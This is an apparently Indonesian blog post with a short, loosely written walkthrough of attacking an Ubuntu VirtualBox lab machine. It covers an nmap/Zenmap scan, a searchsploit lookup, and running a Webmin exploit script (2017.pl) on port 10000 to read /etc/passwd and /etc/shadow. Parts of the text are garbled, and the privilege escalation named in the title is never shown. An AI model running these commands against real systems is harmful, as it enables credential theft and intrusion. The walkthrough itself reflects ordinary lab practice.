Minggu, 16 September 2012

PRIVILEGE ESCALATION OS UBUNTU IN V-BOX

 1.First thing to do scanning <target ip> using Zenmap or can be done also using nmap.
    "example: I do a scan using nmap and Zenmap"

       scans were performed using <ip Target> 






 2.  Here we make use exploitDB existing exploits the application tools.
      and do exploits perform the command:. /
searchsploit  ssh linux remote.



  3. of  commad /searchsploit  ssh linux remote 
      I will do exploits. / searchsploit webmin  prior to proceeding to the next stage 


   in this case I use port 10000/tcp (webmin httpd), and after that I type
   example : "perl platforms/multiple/remote/2017.pl 192.168.43.130 10000 /etc/passwd 0"
   to know the user list or login code.


  4.
    and now type "perl platforms/multiple/remote/2017.pl 192.168.43.130 10000 /etc/shadow 0"to   know    the login password.

 
determines the contents of the files we need to extract the files terlwbih ago



Tidak ada komentar:

Posting Komentar